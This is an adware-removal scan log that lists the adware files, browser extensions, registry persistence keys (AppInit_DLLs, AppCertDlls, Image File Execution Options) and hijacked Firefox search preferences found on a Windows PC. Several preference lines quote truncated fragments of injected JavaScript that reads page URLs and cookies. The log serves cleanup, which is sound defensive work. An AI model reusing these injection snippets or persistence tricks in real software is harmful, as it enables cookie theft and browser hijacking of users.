File Found : C:\END File Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.def ault\invalidprefs.js File Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.def ault\searchplugins\WebSearch.xml File Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.def ault\user.js Folder Found : C:\Program Files (x86)\BitSaveru Folder Found : C:\Program Files (x86)\Browser Tab Search by Ask Folder Found : C:\Program Files (x86)\hotspot shield Folder Found : C:\Program Files (x86)\MinimummPrice Folder Found : C:\Program Files (x86)\NextCoup Folder Found : C:\Program Files (x86)\NeXtCoup Folder Found : C:\Program Files (x86)\sw-booster Folder Found : C:\Program Files (x86)\Tbccint Folder Found : C:\ProgramData\720c00e91a133b50 Folder Found : C:\ProgramData\BitSaveru Folder Found : C:\ProgramData\CheoapeMe Folder Found : C:\ProgramData\GoSAve Folder Found : C:\ProgramData\hotspot shield Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hotspot shie ld Folder Found : C:\ProgramData\MinimummPrice Folder Found : C:\ProgramData\NeXtCoup Folder Found : C:\ProgramData\NextCoup Folder Found : C:\ProgramData\SafetyNut Folder Found : C:\ProgramData\Tbccint Folder Found : C:\ProgramData\Trusted Publisher Folder Found : C:\ProgramData\YooutubeiADBlocke Folder Found : C:\Users\Administrator\AppData\Local\Chromatic Browser Folder Found : C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Defa ult\Extensions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Defa ult\Extensions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Defa ult\Extensions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Defa ult\Extensions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\Administrator\AppData\Local\torch Folder Found : C:\Users\Guest\AppData\Local\Chromatic Browser Folder Found : C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Exte nsions\ejajlieahifkpcjcbabmhocjhclbpffj
Folder Found : C:\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Exte
nsions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Exte nsions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Exte nsions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\Guest\AppData\Local\torch Folder Found : C:\Users\HomeGroupUser$\AppData\Local\Chromatic Browser Folder Found : C:\Users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Def ault\Extensions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Def ault\Extensions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Def ault\Extensions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Def ault\Extensions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\HomeGroupUser$\AppData\Local\torch Folder Found : C:\Users\Public\Documents\baidu Folder Found : C:\Users\Sony\AppData\Local\Chromatic Browser Folder Found : C:\Users\Sony\AppData\Local\Comodo\Dragon\User Data\Default\Exten sions\ejajlieahifkpcjcbabmhocjhclbpffj Folder Found : C:\Users\Sony\AppData\Local\Comodo\Dragon\User Data\Default\Exten sions\nnjmahkelmaomnbdgdjpbpikjgodfklf Folder Found : C:\Users\Sony\AppData\Local\Tbccint Folder Found : C:\Users\Sony\AppData\Local\torch Folder Found : C:\Users\Sony\AppData\LocalLow\DataMngr Folder Found : C:\Users\Sony\AppData\LocalLow\Datamngr Folder Found : C:\Users\Sony\AppData\LocalLow\Hotspot_Shield Folder Found : C:\Users\Sony\AppData\LocalLow\Tbccint Folder Found : C:\Users\Sony\AppData\Roaming\hotspot shield Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\D@2nIIPLq.edu Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\OW@0t.net Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\Pb@z.edu Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\Qp7Aw2F@Y.edu Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\UtQ@Bnei5Oc.net Folder Found : C:\Users\Sony\AppData\Roaming\Mozilla\Firefox\Profiles\h129mkcn.d efault\Extensions\yyyrt@JDF.edu Folder Found : C:\Users\Sony\AppData\Roaming\OpenCandy Folder Found : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\hotspot shield Folder Found : C:\Windows\SysWOW64\hotspot shield ***** [ Scheduled Tasks ] ***** ***** [ Shortcuts ] ***** ***** [ Registry ] ***** Data Found : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [Ap pInit_DLLs] - C:\PROGRA~2\SW-BOO~1\ASSIST~2.DLL Key Found : HKCU\Software\anchorfree Key Found : HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9} Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\Software\Hotspot_Shield Key Found : HKCU\Software\AppDataLow\Software\Smartbar Key Found : HKCU\Software\AppDataLow\Software\SmartBar Key Found : HKCU\Software\AppDataLow\Software\Tbccint Key Found : HKCU\Software\AppDataLow\Software\TbccintSearchScopes Key Found : HKCU\Software\AppDataLow\Toolbar Key Found : HKCU\Software\Conduit Key Found : HKCU\Software\SafetyNut Key Found : HKCU\Software\Tbccint Key Found : HKCU\Software\Tbccint_HKLM Key Found : [x64] HKCU\Software\anchorfree Key Found : [x64] HKCU\Software\Conduit Key Found : [x64] HKCU\Software\SafetyNut Key Found : [x64] HKCU\Software\Tbccint Key Found : [x64] HKCU\Software\Tbccint_HKLM Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0} Key Found : HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9} Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B} Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252} Key Found : HKLM\SOFTWARE\Classes\CLSID\{87EAB409-97D7-4889-ACFA-C548FC6F3ECF} Key Found : HKLM\SOFTWARE\Classes\CLSID\{A40DC6C5-79D0-4CA8-A185-8FF989AF1115} Key Found : HKLM\SOFTWARE\Classes\CLSID\{CC1AC828-BB47-4361-AFB5-96EEE259DD87} Key Found : HKLM\SOFTWARE\Classes\Interface\{1B730ACF-26A3-447B-9994-14AEE0EB72C C} Key Found : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E 5} Key Found : HKLM\SOFTWARE\Classes\SearchQUIEHelper.DNSGuard Key Found : HKLM\SOFTWARE\Classes\SearchQUIEHelper.DNSGuard.1 Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT1561552 Key Found : HKLM\SOFTWARE\Classes\TypeLib\{6A4BCABA-C437-4C76-A54E-AF31B8A76CB9} Key Found : HKLM\SOFTWARE\hotspotshield Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C6 8-4BB3-B188-DD9AF0FD2488} Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4 C-4172-9AC4-73315F71CFFE} Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\bitguard.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\bprotect.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\bprotect.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\bpsvc.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\browserdefender.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\browserdefender.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\browserprotect.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\browserprotect.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\browsersafeguard.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\dprotectsvc.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\jumpflip Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\protectedsearch.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi
on Options\searchinstaller.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\searchprotection.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\searchprotector.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\searchsettings.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\searchsettings64.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\snapdo.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\stinst32.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\stinst64.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\umbrella.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\utiljumpflip.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\volaro Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\vonteera Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\websteroids.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executi on Options\websteroidsservice.exe Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{87EA B409-97D7-4889-ACFA-C548FC6F3ECF} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-A B0D-6D18-C316-52A6A0E1D507} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B9FA5FF-3 E61-4658-B0DA-E6DDB46D6BAD}_is1 Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\hotspotshie ld Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IECT1561552 Key Found : HKLM\SOFTWARE\SafetyNut Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{A40DC6C5-79D0-4CA8-A185-8FF989AF1 115} Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{CC1AC828-BB47-4361-AFB5-96EEE259D D87} Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1B730ACF-26A3-447B-9994-14AEE 0EB72CC} Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserD ata\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094 Value Found : HKLM\SYSTEM\ControlSet001\Control\Session Manager\AppCertDlls [x64 ] Value Found : HKLM\SYSTEM\ControlSet001\Control\Session Manager\AppCertDlls [x86 ] Value Found : HKLM\SYSTEM\ControlSet002\Control\Session Manager\AppCertDlls [x64 ] Value Found : HKLM\SYSTEM\ControlSet002\Control\Session Manager\AppCertDlls [x86 ] Value Found : HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls [x64] Value Found : HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls [x86] ***** [ Browsers ] *****
-\\ Internet Explorer v8.0.7600.16385
-\\ Mozilla Firefox v33.0.3 (x86 en-US) [h129mkcn.default] - Line Found : user_pref("CT1561552.FF19Solved", "true"); [h129mkcn.default] - Line Found : user_pref("CT1561552.UserID", "UN7783718071920 0645"); [h129mkcn.default] - Line Found : user_pref("CT1561552.dum", "2"); [h129mkcn.default] - Line Found : user_pref("CT1561552.fullUserID", "UN778371807 19200645.IN.20140907001643"); [h129mkcn.default] - Line Found : user_pref("CT1561552.installDate", "07/09/2014 00:16:49"); [h129mkcn.default] - Line Found : user_pref("CT1561552.installSessionId", "-1"); [h129mkcn.default] - Line Found : user_pref("CT1561552.installSp", "FALSE"); [h129mkcn.default] - Line Found : user_pref("CT1561552.installerVersion", "1.11. 0.11"); [h129mkcn.default] - Line Found : user_pref("CT1561552.searchRevert", "false"); [h129mkcn.default] - Line Found : user_pref("CT1561552.searchUninstallUserMode", "4"); [h129mkcn.default] - Line Found : user_pref("CT1561552.searchUserMode", "4"); [h129mkcn.default] - Line Found : user_pref("CT1561552.toolbarInstallDate", "0709-2014 00:16:44"); [h129mkcn.default] - Line Found : user_pref("CT1561552.versionFromInstaller", "1 0.34.0.3"); [h129mkcn.default] - Line Found : user_pref("CT1561552.xpeMode", "1"); [h129mkcn.default] - Line Found : user_pref("browser.search.defaultenginename,S" , "WebSearch"); [h129mkcn.default] - Line Found : user_pref("browser.search.defaulturl", "hxxp:/ /websearch.searchandfly.info/?pid=3551&r=2014/09/19&hid=7836397980332745677&lg=E N&cc=ID&unqvl=62&l=1&q="); [h129mkcn.default] - Line Found : user_pref("browser.search.order.1", "WebSearch "); [h129mkcn.default] - Line Found : user_pref("browser.search.order.1,S", "WebSear ch"); [h129mkcn.default] - Line Found : user_pref("browser.search.selectedEngine,S", " WebSearch"); [h129mkcn.default] - Line Found : user_pref("extensions.4fQhbT33SWQPbsA3.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.i ndexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...] [h129mkcn.default] - Line Found : user_pref("extensions.GAeF3NTCdzdeTKF0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.i ndexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...] [h129mkcn.default] - Line Found : user_pref("extensions.GuKNQsA7v68cabJe.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.i ndexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...] [h129mkcn.default] - Line Found : user_pref("extensions.RsvtODM2r3Io4wHY.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.i ndexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...] [h129mkcn.default] - Line Found : user_pref("extensions.SKoIoPFsb3Lnnvpz.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.i ndexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\[...] [h129mkcn.default] - Line Found : user_pref("keyword.URL", "hxxp://websearch.sea rchandfly.info/?pid=3551&r=2014/09/19&hid=7836397980332745677&lg=EN&cc=ID&unqvl= 62&l=1&q="); [h129mkcn.default] - Line Found : user_pref("smartbar.machineId", "67KYF0DIV30+R AJJRZ4FOPYZKDONF3RACQPWOVAEGTSIPGHGTZ9HRYDCARJVV3KJPCRCEAFUZXIVGKURADTMNA"); -\\ Google Chrome v37.0.2062.124